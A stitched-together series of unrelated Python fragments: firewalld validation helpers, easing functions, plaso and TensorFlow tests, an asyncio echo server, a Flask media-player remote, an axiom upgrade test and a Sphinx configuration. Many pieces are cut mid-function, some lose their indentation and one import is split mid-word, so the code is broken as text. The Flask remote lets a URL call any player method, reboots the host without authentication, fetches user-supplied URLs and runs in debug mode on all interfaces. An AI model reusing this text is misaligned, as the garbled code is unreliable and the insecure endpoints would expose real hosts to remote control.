matched.append((id1, id2))
elif id1 > id2:
matched.append((id2, id1))
else:
matched.append((id1, ))
else:
if id1 >= 0:
matched.append((id1,))
if i == len(splits):
# full match, stop here
break
if len(matched) < 1:
return -1
elif len(matched) > 1:
return None
return matched[0]
def portStr(port, delimiter=":"):
    """ Create port and port range string
    @param port port or port range int or [int, int]
    @param delimiter of the output string for port ranges, default ':'
    @return Port or port range string, empty string if port isn't specified, None if port or port range is not valid
    """
    if port == "":
        return ""
    port_range = getPortRange(port)
    if isinstance(port_range, int) and port_range < 0:
        return None
    if len(port_range) == 1:
        return "%s" % port_range
    return "%s%s%s" % (port_range[0], delimiter, port_range[1])
def portInPortRange(port, range):
    """Return True if port falls inside the given port or port range."""
    port_id = getPortID(port)
    range_ids = getPortRange(range)
    if len(range_ids) == 1:
        return port_id == getPortID(range_ids[0])
    return len(range_ids) == 2 and \
        getPortID(range_ids[0]) <= port_id <= getPortID(range_ids[1])
def getServiceName(port, proto):
    """ Check and Get service name from port and proto string combination using socket.getservbyport
    @param port string or id
    @param protocol string
    @return Service name if port and protocol are valid, else None
    """
    try:
        name = socket.getservbyport(int(port), proto)
    except (socket.error, ValueError, OverflowError):
        # ValueError: port is not numeric at all; OverflowError: outside the
        # 0-65535 range accepted by getservbyport. Both previously escaped
        # uncaught, contradicting the documented "else None" contract.
        return None
    return name
def checkIP(ip):
    """ Check IPv4 address.
    @param ip address string
    @return True if address is valid, else False
    """
    try:
        socket.inet_pton(socket.AF_INET, ip)
        return True
    except socket.error:
        return False
def checkIP6(ip):
    """ Check IPv6 address.
    @param ip address string
    @return True if address is valid, else False
    """
    try:
        socket.inet_pton(socket.AF_INET6, ip)
        return True
    except socket.error:
        return False
def checkIPnMask(ip):
    """Check an "addr" or "addr/mask" IPv4 string.

    The mask may be a dotted-quad netmask or a 0-32 prefix length.
    """
    if "/" in ip:
        addr, mask = ip.split("/", 1)
        if len(addr) < 1 or len(mask) < 1:
            return False
    else:
        addr, mask = ip, None
    if not checkIP(addr):
        return False
    if not mask:
        return True
    if "." in mask:
        # Dotted netmask: validate it like an address.
        return checkIP(mask)
    try:
        prefix = int(mask)
    except ValueError:
        return False
    return 0 <= prefix <= 32
def checkIP6nMask(ip):
    """Check an "addr" or "addr/mask" IPv6 string; mask is a 0-128 prefix."""
    if "/" in ip:
        addr, mask = ip.split("/", 1)
        if len(addr) < 1 or len(mask) < 1:
            return False
    else:
        addr, mask = ip, None
    if not checkIP6(addr):
        return False
    if not mask:
        return True
    try:
        prefix = int(mask)
    except ValueError:
        return False
    return 0 <= prefix <= 128
def checkProtocol(protocol):
    """Check a protocol: numeric value 0-255, or a name resolvable by
    socket.getprotobyname."""
    try:
        number = int(protocol)
    except ValueError:
        # Not numeric: fall back to a protocol-name lookup.
        try:
            socket.getprotobyname(protocol)
        except socket.error:
            return False
        return True
    return 0 <= number <= 255
def checkInterface(iface):
    """ Check interface string
    @param interface string
    @return True if interface is valid (maximum 16 chars and does not contain ' ', '/', '!', ':', '*'), else False
    """
    if not iface or len(iface) > 16:
        return False
    # !:* are limits for iptables <= 1.4.5
    forbidden = (' ', '/', '!', '*')
    return not any(ch in iface for ch in forbidden)
def checkUINT32(val):
    """Return True if val parses (base auto-detected, so 0x.. works) as an
    unsigned 32-bit integer."""
    try:
        number = int(val, 0)
    except ValueError:
        return False
    return 0 <= number <= 4294967295
def firewalld_is_active():
    """ Check if firewalld is active
    @return True if there is a firewalld pid file and the pid is used by firewalld
    """
    def first_line(path):
        # First line of path, or None on any read error.
        try:
            with open(path, "r") as fd:
                return fd.readline()
        except Exception:
            return None

    if not os.path.exists(FIREWALLD_PIDFILE):
        return False
    pid = first_line(FIREWALLD_PIDFILE)
    if pid is None:
        return False
    if not os.path.exists("/proc/%s" % pid):
        return False
    cmdline = first_line("/proc/%s/cmdline" % pid)
    return cmdline is not None and "firewalld" in cmdline
def tempFile():
    """Create a named temporary file under FIREWALLD_TEMPDIR.

    The directory is created with mode 0o750 if missing. The file is opened
    in text mode with delete=False so the caller can rename/keep it.
    @return an open NamedTemporaryFile
    @raises whatever creation raised, after logging it

    Fix: removed the unreachable ``return None`` that followed the
    try/except — the except clause always re-raises, so it could never run.
    """
    try:
        if not os.path.exists(FIREWALLD_TEMPDIR):
            os.mkdir(FIREWALLD_TEMPDIR, 0o750)
        return tempfile.NamedTemporaryFile(mode='wt', prefix="temp.",
                                           dir=FIREWALLD_TEMPDIR, delete=False)
    except Exception as msg:
        log.error("Failed to create temporary file: %s" % msg)
        raise
def readfile(filename):
    """Return all lines of filename as a list, or None (logged) on failure."""
    try:
        with open(filename, "r") as f:
            return f.readlines()
    except Exception as e:
        log.error('Failed to read file "%s": %s' % (filename, e))
    return None
def writefile(filename, line):
    """Write line to filename; True on success, False (logged) on failure."""
    try:
        with open(filename, "w") as f:
            f.write(line)
        return True
    except Exception as e:
        log.error('Failed to write to file "%s": %s' % (filename, e))
        return False
def enable_ip_forwarding(ipv):
    """Enable kernel IP forwarding for "ipv4" or "ipv6" via /proc; returns
    the writefile() result, or False for an unknown family."""
    proc_paths = {
        "ipv4": "/proc/sys/net/ipv4/ip_forward",
        "ipv6": "/proc/sys/net/ipv6/conf/all/forwarding",
    }
    if ipv not in proc_paths:
        return False
    return writefile(proc_paths[ipv], "1\n")
def get_modinfos(path_templates, prefix):
    """Yield modinfo field dicts for kernel modules matching prefix.

    @param path_templates directory templates containing one '%s' that is
           filled in with the running kernel version (os.uname()[2])
    @param prefix only module files starting with this prefix are queried
    @return generator of {field_name: [values]} dicts, one per module
    """
    kver = os.uname()[2]
    modules = []
    for path in (t % kver for t in path_templates):
        if os.path.isdir(path):
            for filename in sorted(os.listdir(path)):
                if filename.startswith(prefix):
                    modules.append(filename.split(".")[0])
    if modules:
        # Ignore status as it is not 0 if even one module had problems
        (status, ret) = runProg(COMMANDS["modinfo"], modules)
        entry = {}
        # Parse concatenated "key: value" modinfo output line by line.
        for m in re.finditer(r"^(\w+):[ \t]*(\S.*?)[ \t]*$", ret, re.MULTILINE):
            key, value = m.groups()
            # Assume every entry starts with filename
            if key == "filename" and "filename" in entry:
                yield entry
                entry = {}
            entry.setdefault(key, [ ]).append(value)
        if "filename" in entry:
            yield entry
def get_nf_conntrack_helpers():
helpers = { }
for modinfo in get_modinfos(["/lib/modules/%s/kernel/net/netfilter/"], "nf_conntrack_"):
filename = modinfo['filename'][0].split("/")[-1]
name = filename.split(".")[0]
# If module name matches "nf_conntrack_proto_*"
# the we add it to helpers list |
import math
def OUT_CIRC(t, b, c, d):
    """Circular ease-out: t=time, b=start value, c=change, d=duration."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    progress = t / d - 1
    return c * math.sqrt(1 - progress * progress) + b
def OUT_QUART(t, b, c, d):
    """Quartic ease-out: t=time, b=start value, c=change, d=duration."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    p = t / d - 1
    return -c * (p * p * p * p - 1) + b
def INOUT_CIRC(t, b, c, d):
    """Circular ease-in-out: accelerate to the midpoint, then decelerate."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    ratio = t / (d / 2)
    if ratio < 1:
        return -c / 2 * (math.sqrt(1 - ratio ** 2) - 1) + b
    return c / 2 * (math.sqrt(1 - (ratio - 2) ** 2) + 1) + b
def IN_CUBIC(t, b, c, d):
    """Cubic ease-in: t=time, b=start value, c=change, d=duration."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    p = t / d
    return c * p * p * p + b
def OUT_QUAD(t, b, c, d):
    """Quadratic ease-out: t=time, b=start value, c=change, d=duration."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    p = t / d
    return -c * p * (p - 2) + b
def OUT_BOUNCE(t, b, c, d):
    """Bounce ease-out: four parabolic arcs of decreasing height."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    p = t / d
    if p < (1 / 2.75):
        return c * (7.5625 * p * p) + b
    if p < (2 / 2.75):
        p -= (1.5 / 2.75)
        return c * (7.5625 * p * p + .75) + b
    if p < (2.5 / 2.75):
        p -= (2.25 / 2.75)
        return c * (7.5625 * p * p + .9375) + b
    p -= (2.625 / 2.75)
    return c * (7.5625 * p * p + .984375) + b
def INOUT_EXP(t, b, c, d):
    """Exponential ease-in-out; endpoints return b and b+c exactly, with the
    0.0005/1.0005 factors compensating for 2**-10 not being zero."""
    t, b, c, d = float(t), float(b), float(c), float(d)
    if t == 0:
        return b
    if t == d:
        return b + c
    ratio = t / (d / 2)
    if ratio < 1:
        return c / 2 * math.pow(2, 10 * (ratio - 1)) + b - c * 0.0005
    return c / 2 * 1.0005 * (-math.pow(2, -10 * (ratio - 1)) + 2) + b
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Internet Explorer WebCache database."""
import unittest
from plaso.lib import definitions
from plaso.parsers.esedb_plugins import msie_webcache
from tests.parsers.esedb_plugins import test_lib
class MsieWebCacheESEDBPluginTest(test_lib.ESEDBPluginTestCase):
  """Tests for the MSIE WebCache ESE database plugin."""

  # pylint: disable=protected-access

  def testConvertHeadersValues(self):
    """Tests the _ConvertHeadersValues function."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()

    # Raw CRLF-separated HTTP response headers as stored in the database.
    binary_value = (
        b'HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n'
        b'X-Content-Type-Options: nosniff\r\nContent-Length: 2759\r\n'
        b'X-XSS-Protection: 1; mode=block\r\n'
        b'Alternate-Protocol: 80:quic\r\n\r\n')

    # The plugin flattens the headers into one bracketed, ';'-joined string.
    expected_headers_value = (
        '[HTTP/1.1 200 OK; Content-Type: image/png; '
        'X-Content-Type-Options: nosniff; Content-Length: 2759; '
        'X-XSS-Protection: 1; mode=block; '
        'Alternate-Protocol: 80:quic]')

    headers_value = plugin._ConvertHeadersValues(binary_value)
    self.assertEqual(headers_value, expected_headers_value)

  def testProcessOnDatabaseWithPartitionsTable(self):
    """Tests the Process function on database with a Partitions table."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()
    storage_writer = self._ParseESEDBFileWithPlugin(['WebCacheV01.dat'], plugin)

    self.assertEqual(storage_writer.number_of_events, 1354)
    self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
    self.assertEqual(storage_writer.number_of_recovery_warnings, 0)

    # The order in which ESEDBPlugin._GetRecordValues() generates events is
    # nondeterministic hence we sort the events.
    events = list(storage_writer.GetSortedEvents())

    expected_event_values = {
        'container_identifier': 1,
        'data_type': 'msie:webcache:containers',
        'date_time': '2014-05-12 07:30:25.4861987',
        'directory': (
            'C:\\Users\\test\\AppData\\Local\\Microsoft\\Windows\\'
            'INetCache\\IE\\'),
        'name': 'Content',
        'set_identifier': 0,
        'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_ACCESS}

    self.CheckEventValues(storage_writer, events[567], expected_event_values)

  def testProcessOnDatabaseWithPartitionsExTable(self):
    """Tests the Process function on database with a PartitionsEx table."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()
    storage_writer = self._ParseESEDBFileWithPlugin(
        ['PartitionsEx-WebCacheV01.dat'], plugin)

    self.assertEqual(storage_writer.number_of_events, 4014)
    self.assertEqual(storage_writer.number_of_extraction_warnings, 3)
    self.assertEqual(storage_writer.number_of_recovery_warnings, 0)

    # The order in which ESEDBPlugin._GetRecordValues() generates events is
    # nondeterministic hence we sort the events.
    events = list(storage_writer.GetSortedEvents())

    expected_event_values = {
        'access_count': 5,
        'cache_identifier': 0,
        'cached_file_size': 726,
        'cached_filename': 'b83d57c0[1].svg',
        'container_identifier': 14,
        'data_type': 'msie:webcache:container',
        'date_time': '2019-03-20 17:22:14.0000000',
        'entry_identifier': 63,
        'sync_count': 0,
        'response_headers': (
            '[HTTP/1.1 200; content-length: 726; content-type: image/svg+xml; '
            'x-cache: TCP_HIT; x-msedge-ref: Ref A: 3CD5FCBC8EAD4E0A80FA41A62'
            'FBC8CCC Ref B: PRAEDGE0910 Ref C: 2019-12-16T20:55:28Z; date: '
            'Mon, 16 Dec 2019 20:55:28 GMT]'),
        'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
        'url': 'https://www.bing.com/rs/3R/kD/ic/878ca0cd/b83d57c0.svg'}

    self.CheckEventValues(storage_writer, events[100], expected_event_values)
if __name__ == '__main__':
unittest.main()
|
rifies that the restore is successful.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
# Skip `break_point` items and store the remaining produced from ds_fn
# in `expected`.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
expected = self.gen_outputs(
ds_fn, [],
num_outputs - break_point,
ckpt_saved=True,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
# Generate `break_point` items from ds_fn and save checkpoint.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
actual = []
# Build an empty graph but load checkpoint for ds_fn.
with ops.Graph().as_default() as g:
get_next_op, saver = self._build_empty_graph(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._restore(saver, sess)
for _ in range(num_outputs - break_point):
actual.append(sess.run(get_next_op))
if verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
self.match(expected, actual)
  def verify_error_on_save(self,
                           ds_fn,
                           num_outputs,
                           error,
                           break_point=None,
                           sparse_tensors=False):
    """Attempts to save a non-saveable iterator.
    Args:
      ds_fn: See `run_core_tests`.
      num_outputs: See `run_core_tests`.
      error: Declared error when trying to save iterator.
      break_point: Break point. Optional. Defaults to num_outputs/2.
      sparse_tensors: See `run_core_tests`.
    Raises:
      AssertionError if any test fails.
    """
    break_point = num_outputs // 2 if not break_point else break_point
    with ops.Graph().as_default() as g:
      init_op, get_next_op, saver = self._build_graph(
          ds_fn, sparse_tensors=sparse_tensors)
      get_next_op = remove_variants(get_next_op)
      with self.session(graph=g) as sess:
        self._initialize(init_op, sess)
        # Advance the iterator to the break point before attempting the save.
        for _ in range(break_point):
          sess.run(get_next_op)
        # Saving a non-saveable iterator must raise the declared error.
        with self.assertRaises(error):
          self._save(sess, saver)
  def verify_run_with_breaks(self,
                             ds_fn,
                             break_points,
                             num_outputs,
                             init_before_restore=False,
                             sparse_tensors=False,
                             verify_exhausted=True):
    """Verifies that ds_fn() produces the same outputs with and without breaks.
    1. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
       *without* stopping at break points.
    2. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
       with stopping at break points.
    Deep matches outputs from 1 and 2.
    Args:
      ds_fn: See `gen_outputs`.
      break_points: See `gen_outputs`.
      num_outputs: See `gen_outputs`.
      init_before_restore: See `gen_outputs`.
      sparse_tensors: See `run_core_tests`.
      verify_exhausted: See `gen_outputs`.
    Raises:
      AssertionError if any test fails.
    """
    # Reference run: no break points, single uninterrupted iteration.
    expected = self.gen_outputs(
        ds_fn, [],
        num_outputs,
        init_before_restore=init_before_restore,
        sparse_tensors=sparse_tensors,
        verify_exhausted=verify_exhausted)
    # Checkpointed run: save/restore at every break point.
    actual = self.gen_outputs(
        ds_fn,
        break_points,
        num_outputs,
        init_before_restore=init_before_restore,
        sparse_tensors=sparse_tensors,
        verify_exhausted=verify_exhausted)
    self.match(expected, actual)
  def gen_outputs(self,
                  ds_fn,
                  break_points,
                  num_outputs,
                  ckpt_saved=False,
                  init_before_restore=False,
                  sparse_tensors=False,
                  verify_exhausted=True,
                  save_checkpoint_at_end=True):
    """Generates elements from input dataset while stopping at break points.
    Produces `num_outputs` outputs and saves the state of the iterator in the
    Saver checkpoint.
    Args:
      ds_fn: 0-argument function that returns the dataset.
      break_points: A list of integers. For each `break_point` in
        `break_points`, we produce outputs till `break_point` number of items
        have been produced and then checkpoint the state. The current graph
        and session are destroyed and a new graph and session are used to
        produce outputs till next checkpoint or till `num_outputs` elements
        have been produced. `break_point` must be <= `num_outputs`.
      num_outputs: The total number of outputs to produce from the iterator.
      ckpt_saved: Whether a checkpoint already exists. If False, we build the
        graph from ds_fn.
      init_before_restore: Whether init should be called before saver.restore.
        This is just so that we can verify that restoring an already initialized
        iterator works.
      sparse_tensors: Whether dataset is built from SparseTensor(s).
      verify_exhausted: Whether to verify that the iterator has been exhausted
        after producing `num_outputs` elements.
      save_checkpoint_at_end: Whether to save a checkpoint after producing all
        outputs. If False, checkpoints are saved each break point but not at the
        end. Note that checkpoints overwrite each other so there is always only
        a single checkpoint available. Defaults to True.
    Returns:
      A list of `num_outputs` items.
    """
    outputs = []

    def get_ops():
      # Either restore the iterator ops from the checkpointed meta graph, or
      # build them fresh from ds_fn for the first segment.
      if ckpt_saved:
        saver = self._import_meta_graph()
        init_op, get_next_op = self._get_iterator_ops_from_collection(
            ds_fn, sparse_tensors=sparse_tensors)
      else:
        init_op, get_next_op, saver = self._build_graph(
            ds_fn, sparse_tensors=sparse_tensors)
      return init_op, get_next_op, saver

    # One segment per break point, plus a final segment up to num_outputs.
    for i in range(len(break_points) + 1):
      with ops.Graph().as_default() as g:
        init_op, get_next_op, saver = get_ops()
        get_next_op = remove_variants(get_next_op)
        with self.session(graph=g) as sess:
          if ckpt_saved:
            if init_before_restore:
              self._initialize(init_op, sess)
            self._restore(saver, sess)
          else:
            self._initialize(init_op, sess)
          # This segment produces items [previous break point, next one).
          start = break_points[i - 1] if i > 0 else 0
          end = break_points[i] if i < len(break_points) else num_outputs
          num_iters = end - start
          for _ in range(num_iters):
            outputs.append(sess.run(get_next_op))
          if i == len(break_points) and verify_exhausted:
            with self.assertRaises(errors.OutOfRangeError):
              sess.run(get_next_op)
          if save_checkpoint_at_end or i < len(break_points):
            self._save(sess, saver)
            ckpt_saved = True
    return outputs
def match(self, expected, actual):
"""Matches nested structures.
Recursively matches shape and values of `expected` and `actual`.
Handles scalars, numpy arrays and other python sequence containers
e.g. list, dict.
Args:
expected: Nested structure 1.
actual: Nested structure 2.
Raises:
AssertionError if matching fails.
"""
if isinstance(expected, np.ndarray):
expected = expected.tolist()
if isinstance(actual, np.ndarray):
actual = actual.tolist()
self.assertEqual(type(expected), type(actual))
if nest.is_sequence(expected):
self.assertEqual(len(expected), len(actual))
if isinstance(expected, dict):
for k |
f | rom flappy.display3d.vertexbuffer3d import VertexBuffer3D, VertexBuffer3DFormat
from flappy.display3d.indexbuffer3d import IndexBuffer3D
from flappy.display3d.program3d import Program3D
from flappy.display3d.texture import Texture
from flappy.display3d.scene3d import Scene3D
| |
import asyncio
import logging
import concurrent.futures
class EchoServer(object):
    """Echo server: writes every received line straight back to the client.

    Connections idle for more than 10 seconds are closed.
    """

    def __init__(self, host, port, loop=None):
        self._loop = loop or asyncio.get_event_loop()
        # start_server returns a coroutine here; it is awaited in start().
        self._server = asyncio.start_server(self.handle_connection, host=host, port=port)

    def start(self, and_loop=True):
        """Bind the listening socket and optionally run the loop forever."""
        self._server = self._loop.run_until_complete(self._server)
        logging.info('Listening established on {0}'.format(self._server.sockets[0].getsockname()))
        if and_loop:
            self._loop.run_forever()

    def stop(self, and_loop=True):
        """Close the listening socket and optionally close the event loop."""
        self._server.close()
        if and_loop:
            self._loop.close()

    async def handle_connection(self, reader, writer):
        """Per-connection handler: echo lines until EOF or a 10s read timeout.

        Fix: rewritten as a native coroutine. The original used the
        @asyncio.coroutine / ``yield from`` style, which was deprecated and
        removed in Python 3.11; asyncio.TimeoutError replaces the old
        concurrent.futures.TimeoutError raised by wait_for on 3.4-3.7.
        """
        peername = writer.get_extra_info('peername')
        logging.info('Accepted connection from {}'.format(peername))
        while not reader.at_eof():
            try:
                data = await asyncio.wait_for(reader.readline(), timeout=10.0)
                writer.write(data)
            except asyncio.TimeoutError:
                break
        writer.close()
if __name__ == '__main__':
    # Run a local echo server on 127.0.0.1:8899 until interrupted.
    logging.basicConfig(level=logging.DEBUG)
    server = EchoServer('127.0.0.1', 8899)
    try:
        server.start()
    except KeyboardInterrupt:
        pass  # Press Ctrl+C to stop
    finally:
        server.stop()
import numpy as np
import numpy.testing as npt
import AFQ.utils.parallel as para
def power_it(num, n=2):
    """Raise num to the n-th power (top-level so it is picklable by parfor)."""
    return pow(num, n)
def test_parfor():
    """parfor must agree with direct evaluation for every engine/backend."""
    my_array = np.arange(100).reshape(10, 10)
    row, col = np.random.randint(0, 9, 2)
    my_list = list(my_array.ravel())
    for engine in ["joblib", "dask", "serial"]:
        for backend in ["threading", "multiprocessing"]:
            shaped = para.parfor(power_it,
                                 my_list,
                                 engine=engine,
                                 backend=backend,
                                 out_shape=my_array.shape)
            npt.assert_equal(shaped[row, col], power_it(my_array[row, col]))
            # If it's not reshaped, the first item should be the item 0, 0:
            flat = para.parfor(power_it,
                               my_list,
                               engine=engine,
                               backend=backend)
            npt.assert_equal(flat[0], power_it(my_array[0, 0]))
|
#!/usr/bin/env python3.4
# dotslash for local
from flask import Flask, render_template, request, redirect
from werkzeug.contrib.fixers import ProxyFix
from urllib.request import urlopen, Request
from urllib.parse import urlparse
from omxplayer import OMXPlayer
from youtube_dl import YoutubeDL
from youtube_dl.utils import DownloadError
from livestreamer import Livestreamer, PluginError
import os
import traceback
import re
import json
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
player = None
title = None
last_logged_message = ""
# this regex is to escape terminal color codes.
_ANSI_ESCAPE_REXP = re.compile(r"\x1b[^m]*m")
@app.route('/about/')
def splash():
    """Render the static about/splash page."""
    return render_template('splash.html')
@app.route('/')
def root(): # redirect to remote for now, might change.
    """Root URL: currently redirects to the remote-control page."""
    return redirect('/remote')
@app.route('/remote/')
def remote():
    """Render the remote-control UI."""
    return render_template('remote.html')
@app.route('/settings/')
def settings():
    """Render the settings page."""
    return render_template('settings.html')
@app.route('/remote/omxplayer/<command>') # sending keys from the remote
def omxplayer_remote(command):
    """Invoke the named method on the active omxplayer instance."""
    active = get_player()
    if active is None:
        return 'nothing playing', 400
    getattr(active, command)()
    return '', 204
@app.route('/remote/system/<command>')
def system_remote(command):
    """Handle system-level remote commands; only "reboot" is supported."""
    if command != "reboot":
        return 'bad command', 400
    log('rebooting!')
    os.system("sudo reboot")
    return '', 204 # success!
@app.route('/status/')
def status():
    """Report player state as JSON: loaded flag, paused flag and title."""
    active = get_player()
    if active is None:
        payload = {'video_loaded': False}
    else:
        payload = {
            'video_loaded': True,
            'paused': active.paused,
            'now_playing': title
        }
    return json.dumps(payload)
@app.route('/play', methods=['GET'])
def play_url(): # this only plays http urls for now, torrents soon.
    """Resolve /play?url=... to a playable media URI and start omxplayer.

    Resolution order: raw audio/video file -> torrent (unimplemented) ->
    livestream via livestreamer -> anything youtube-dl can extract.
    Returns 204 on success, 400 with the error text on failure.
    """
    global title
    url = request.args.get('url') # grab url from /play?url=*
    if not url.startswith('http'): # in case the user forgot it
        log('url missing http/wrong protocol')
        url = 'http://' + url # let's assume it's http, not https
    log('received url %s' % url)
    log('requesting headers from %s...' % url)
    req = Request(url)
    req.get_method = lambda: 'HEAD' # only request headers, no content
    response = urlopen(req)
    ctype = response.headers['content-type']
    ctype_split = ctype.split('/') # split into 2 parts
    log('headers received. content type is %s' % ctype)
    try:
        if ctype_split[0] == 'audio' or ctype_split[0] == 'video':
            log('url was raw media file, playing! :)')
            title = url # i guess this works? :T
            play_omxplayer(url)
        elif ctype_split[1] == 'x-bittorrent':
            log('loading torrents not implemented.')
            # this isn't implemented yet.
        elif ctype_split[0] == 'text':
            # here we check if it's a livestream, and if so get the RTMP url
            log('checking if url is a livestream...')
            live = Livestreamer()
            try:
                if "youtube" in url:
                    raise RuntimeError("youtube is fucked up w/ streaming, falling back to youtube-dl")
                plugin = live.resolve_url(url)
                streams = plugin.get_streams()
                stream = streams.get("best") # fingers crossed for best quality
                stream_url_types = ['rtmp', 'url'] # things that livestreamer can have :D
                for stream_type in stream_url_types:
                    if hasattr(stream, stream_type):
                        log('url is livestream!')
                        title = "%s (livestream)" % url
                        play_omxplayer(getattr(stream, stream_type))
                        return '', 204
            except (PluginError, RuntimeError) as e: # therefore url is not (supported) livestream
                pass # continue and let youtube-dl try.
            log('loading youtube-dl for further processing')
            ydl = YoutubeDL({'outtmpl': '%(id)s%(ext)s', 'restrictfilenames': True})
            ydl.add_default_info_extractors()
            result = ydl.extract_info(url, download=False)
            if 'entries' in result: # if video is a playlist
                video = result['entries'][0] # play the 1st video in the playlist
            else:
                video = result
            play_omxplayer(video['url'])
            title = video['title']
        else:
            raise DownloadError('Invalid filetype: not audio, video, or text.')
        return '', 204 # success w/ no response!
    except (UnicodeDecodeError, DownloadError) as e:
        # Strip terminal color codes from youtube-dl errors before replying.
        return _ANSI_ESCAPE_REXP.sub('', str(e)), 400 # send error message
@app.route("/log/")
def gen_log():
    """Expose the most recent log line for the web UI to poll."""
    return get_last_logged_message()
def play_omxplayer(uri):
    """Stop any active player and start a new omxplayer on the given URI.

    NOTE(review): the -b/-r/queue flags presumably tune playback for
    streaming — confirm against the omxplayer wrapper's documentation.
    """
    log('playing %s in omxplayer...' % uri)
    global player
    if get_player() is not None:
        player.stop()
    player = OMXPlayer(uri,
                       args='-b -r --audio_queue=10 --video_queue=40',
                       start_playback=True)
def log(text):
    """Print a tagged message and remember it for the /log/ endpoint."""
    global last_logged_message
    print("[sparky] %s" % text)
    last_logged_message = text
def get_last_logged_message():
    """Return the most recent message recorded by log()."""
    # Read-only access: no 'global' declaration needed.
    return last_logged_message
def get_player():
    """Return the active OMXPlayer, clearing state once playback finishes.

    Fix: ``title`` was assigned without a ``global`` declaration, creating a
    useless local — the module-level title was never cleared, so /status/
    kept reporting the previous video after playback ended.
    """
    global player, title
    if player is not None and player.has_finished():
        player = None
        title = None
    return player
if __name__ == '__main__':
app.run("0.0.0.0", debug=True)
|
from axiom.test.historic.stubloader import StubbedTest
from xquotient.mail import MailTransferAgent
from axiom.userbase import LoginSystem
class MTAUpgraderTest(StubbedTest):
    """Historic-store upgrade test for MailTransferAgent schema 2 -> 3."""
    def testMTA2to3(self):
        """
        Make sure MailTransferAgent upgraded OK and that its
        "userbase" attribute refers to the store's userbase.
        """
        mta = self.store.findUnique(MailTransferAgent)
        # The upgrader must re-link the MTA to the store's LoginSystem.
        self.assertIdentical(mta.userbase,
                             self.store.findUnique(LoginSystem))
| |
at not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
sys.path.append(os.path.abspath('_themes'))
sys.path.append(os.path.abspath('.'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.1'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Gateway'
copyright = u'2012, Stephane Wirtel'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# Pull the release string from the installed distribution metadata so the
# built docs always match the package version.
import pkg_resources
try:
    release = pkg_resources.get_distribution('gateway').version
except pkg_resources.DistributionNotFound:
    # Fix: the original used Python 2 print statements, which are a
    # SyntaxError under Python 3; print(...) works on both 2 and 3.
    print('To build the documentation, The distribution information of Gateway')
    print('Has to be available. Either install the package into your')
    print('development environment or run "setup.py develop" to setup the')
    print('metadata. A virtualenv is recommended!')
    sys.exit(1)
del pkg_resources
# Strip any local suffix after 'dev'; version is the two-part "X.Y" form.
if 'dev' in release:
    release = release.split('dev')[0] + 'dev'
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# -- Sphinx build configuration (fragment): HTML, LaTeX, man and Texinfo output.
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'sphinx'
# Use the Flask theme's custom Pygments style instead of the Sphinx default.
pygments_style = 'flask_theme_support.FlaskyStyle'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'flask'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
